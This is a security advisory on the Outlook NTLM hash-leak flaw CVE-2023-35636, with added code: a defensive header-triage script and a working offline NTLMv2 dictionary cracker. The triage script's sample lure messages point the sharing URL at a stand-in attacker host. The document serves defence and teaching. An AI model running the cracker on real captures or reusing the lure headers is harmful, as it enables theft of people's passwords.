Synthesis of Analysis


Severity

Medium

Analysis Summary:


Exploiting a now-fixed vulnerability in Microsoft Outlook gives threat actors access to NT LAN Manager (NTLM) v2 hashed passwords when a victim opens a specially crafted file, researchers have discovered.

The flaw is tracked as CVE-2023-35636 and was patched in the Microsoft Patch Tuesday updates of December 2023. In an email-based attack scenario, a threat actor sends a specially crafted file to the target and convinces the user to open it. In a web-based scenario, the attacker hosts a website (or uses a compromised website) that contains a specially crafted file designed to exploit the flaw. In neither case can the attacker force the victim to visit the site or open the file: the user has to be persuaded to click a link embedded in a phishing email or an instant message, and then be tricked into opening the file in question.

CVE-2023-35636 lies in Outlook's calendar-sharing function. The attacker crafts an email message with two headers, "Content-Class" and "x-sharing-config-url", where the second points to an attacker-controlled location. When the victim opens the invitation, Outlook follows that URL and authenticates to it, and the victim's NTLM v2 hash is exposed during that authentication. Security researchers also showed that NTLM hashes can be leaked through Windows Performance Analyzer (WPA) and Windows File Explorer; those two attack methods remain unfixed.
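One practical use of that header detail is a mail-gateway or SOC triage rule that inspects exactly those two headers. The script below is an added example, not part of the original advisory or of the researchers' work: the header value "Sharing", the internal host allowlist, the sample messages and the TEST-NET address are all constructed assumptions. Legitimate sharing invitations carry the same headers, so the rule does not alert on their presence alone; it flags a sharing-config URL that is a UNC path (which would make Outlook open an SMB session and authenticate to whatever host it names) or that points outside the allowlist.

```python
"""Triage rule for the header pair behind CVE-2023-35636.

Added example, not part of the original advisory or the researchers' work.
The value "Sharing", the allowlist and the sample messages are assumptions.
"""
from email import message_from_bytes
from urllib.parse import urlsplit

# Assumption: the only hosts allowed to serve sharing configuration internally.
INTERNAL_HOSTS = {"sharing.corp.example", "exchange.corp.example"}


def classify_sharing_url(value: str) -> list[str]:
    """Reasons a sharing-config URL looks like an NTLM-leak lure (empty if clean)."""
    v = value.strip()
    if v.startswith("\\\\") or v.startswith("//"):
        # \\host\share: Outlook would open an SMB session and authenticate to it.
        return ["UNC path " + v]
    reasons = []
    parts = urlsplit(v)
    host = (parts.hostname or "").lower()
    if parts.scheme.lower() != "https":
        reasons.append(f"non-HTTPS scheme {parts.scheme or '(none)'!r}")
    if host not in INTERNAL_HOSTS:
        reasons.append(f"external host {host!r}")
    return reasons


def check_message(raw: bytes) -> list[str]:
    """Return findings for one RFC 822 message; an empty list means no concern."""
    msg = message_from_bytes(raw)
    config_url = msg.get("x-sharing-config-url")
    if config_url is None:
        return []
    findings = []
    content_class = (msg.get("Content-Class") or "").strip()
    if content_class.lower() != "sharing":  # value assumed for calendar-sharing invitations
        findings.append(f"x-sharing-config-url present but Content-Class is {content_class!r}")
    findings += ["suspicious x-sharing-config-url: " + r for r in classify_sharing_url(config_url)]
    return findings


# Constructed sample messages (not real captures).
BENIGN = b"""From: alice@corp.example
To: bob@corp.example
Subject: Sharing invitation: Alice's calendar
Content-Class: Sharing
x-sharing-config-url: https://sharing.corp.example/alice/config.xml

Alice would like to share her calendar with you.
"""

UNC_LURE = b"""From: benefits@hr-portal.example
To: bob@corp.example
Subject: Updated holiday calendar
Content-Class: Sharing
x-sharing-config-url: \\\\203.0.113.7\\share\\config.xml

Open the attached calendar for the new schedule.
"""

HTTP_LURE = b"""From: benefits@hr-portal.example
To: bob@corp.example
Subject: Updated holiday calendar
Content-Class: Sharing
x-sharing-config-url: http://cal.hr-portal.example/config.xml

Open the attached calendar for the new schedule.
"""

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN), ("unc", UNC_LURE), ("http", HTTP_LURE)):
        print(name, check_message(raw) or "clean")
```

Run it against an .eml export (or wire it into a milter) and treat any non-empty result as a reason to quarantine; the allowlist check is what catches an attacker who uses an https:// URL instead of a UNC path.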

Notably, WPA attempts to authenticate using NTLM v2 over the open web. As a rule, NTLM v2 should only be used when authenticating against internal, IP-address-based services; an NTLM v2 hash that travels over the open internet is exposed to offline brute-force attacks.
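To show why that matters, the following added example (not from the original advisory) walks through the offline attack. With the server challenge, the client blob and the 16-byte NTProofStr from one captured NTLMv2 exchange, an attacker recomputes the response for each candidate password until one matches, without ever touching the victim's network again. The user name, domain, password, challenge values and wordlist are constructed; the NT hash, NTOWFv2 and NTProofStr construction follows MS-NLMP, and the output line uses the format hashcat expects for mode 5600.

```python
"""Offline dictionary attack on a captured NTLMv2 response.

Added example, not from the original advisory. All user, domain, password
and challenge values are constructed for illustration.
"""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320. OpenSSL 3 moves MD4 to the legacy provider, so
    hashlib.new('md4') may fail; fall back to a pure-Python implementation."""
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:
        pass
    mask = 0xFFFFFFFF
    rol = lambda v, n: ((v << n) | (v >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    order2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    order3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a = rol((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rol((a + g(b, c, d) + x[order2[i]] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rol((a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0 = (a0 + a) & mask, (b0 + b) & mask
        c0, d0 = (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password (what the SAM / NTDS stores)."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(upper(user) + domain))."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def nt_proof_str(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob). The wire
    NtChallengeResponse is NTProofStr || blob, so a sniffer sees the blob too."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, "md5").digest()


def hashcat_5600_line(user, domain, server_challenge, nt_proof, blob) -> str:
    """Format the capture the way hashcat mode 5600 (NetNTLMv2) expects it."""
    return f"{user}::{domain}:{server_challenge.hex()}:{nt_proof.hex()}:{blob.hex()}"


def crack(user, domain, server_challenge, blob, nt_proof, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches, else None."""
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof_str(candidate, user, domain, server_challenge, blob), nt_proof):
            return candidate
    return None


# Constructed "capture": what an attacker-controlled server would record.
USER, DOMAIN, SECRET = "bob", "CORP", "Summer2023!"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
BLOB = (bytes.fromhex("0101000000000000")      # RespType, HiRespType, reserved
        + bytes(8)                              # timestamp (zeroed for the example)
        + bytes.fromhex("aaaaaaaaaaaaaaaa")     # client challenge
        + bytes(4) + bytes(4) + bytes(4))       # reserved, empty AV_PAIR list, reserved
CAPTURED_PROOF = nt_proof_str(SECRET, USER, DOMAIN, SERVER_CHALLENGE, BLOB)
WORDLIST = ["password", "Welcome1", "Spring2023!", "Summer2023!"]

if __name__ == "__main__":
    print(hashcat_5600_line(USER, DOMAIN, SERVER_CHALLENGE, CAPTURED_PROOF, BLOB))
    print("recovered:", crack(USER, DOMAIN, SERVER_CHALLENGE, BLOB, CAPTURED_PROOF, WORDLIST))
```

Each guess costs one MD4 and two HMAC-MD5 operations, so a GPU cracker works through ordinary wordlists in minutes; the only defences are a password the wordlist does not contain and never letting the exchange leave the network in the first place.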

Microsoft announced in October 2023 that it plans to discontinue NTLM in Windows 11 and move to Kerberos for better security, since NTLM does not support modern cryptographic methods and is susceptible to relay attacks.


Impact

  • Disclosure of Information
  • Credential theft

Indicators of Compromise:


  • CVE-2023-35636

Remediation:

  • Use Microsoft Automatic Update to apply the appropriate patch for your system, or use the Microsoft Security Update Guide to find available patches. Beware of phishing emails and do not click on links from senders you do not know.
  • Organizations should test their assets for this vulnerability and implement the available security measures or mitigation steps as soon as possible.
  • Use multifactor authentication to add an extra layer of security for login processes.
  • Monitor network activity regularly for any unusual behavior, as this could indicate a cyberattack.
  • Organizations need to be vigilant and follow cybersecurity best practices to protect their systems and data from potential threats. This includes regularly updating software and implementing robust access and monitoring tools.
  • Develop a comprehensive incident response plan to effectively respond in the event of a security breach or data leak.
  • Make sure to back up critical data and systems on a regular basis to ensure data recovery in the event of a security incident.
  • Adhere to good security practices, including the principle of least privilege, and ensure that users and applications have only the permissions they need.
  • Establish a robust patch management process to ensure that security patches are tested and deployed quickly.
  • Conduct security audits and assessments to assess the security level of all your systems and networks.
  • Use network segmentation to contain and isolate potential threats to limit the impact on critical systems.